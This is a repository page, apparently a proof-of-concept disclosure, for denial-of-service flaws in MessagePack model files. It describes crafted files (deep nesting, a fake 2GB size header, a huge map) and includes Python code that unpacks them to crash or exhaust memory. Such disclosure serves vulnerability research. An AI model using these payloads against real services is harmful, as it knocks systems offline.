WolfpackArmy
/

msgpack-dos-poc

Model card Files Files and versions

YAML Metadata Warning:empty or missing yaml metadata in repo card

Check out the documentation for more information.

MessagePack Model File Vulnerability PoC

Vulnerability

DoS via Deep Nesting Stack Overflow, OOM Bomb, and CPU Exhaustion in MessagePack model files

Files

poc_deep_nest.msgpack — 5,000 levels of nested maps, causes stack overflow on unpack
poc_oom_bomb.msgpack — 21 bytes, bin32 header claiming ~2GB allocation
poc_huge_map.msgpack — 100K key-value pairs, causes CPU/memory exhaustion
benign.msgpack — Clean file for comparison

Reproduce

import msgpack
# Stack overflow from deep nesting:
with open('poc_deep_nest.msgpack', 'rb') as f:
    msgpack.unpackb(f.read())  # RecursionError / crash

# OOM from fake size header:
with open('poc_oom_bomb.msgpack', 'rb') as f:
    msgpack.unpackb(f.read())  # Attempts ~2GB allocation

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support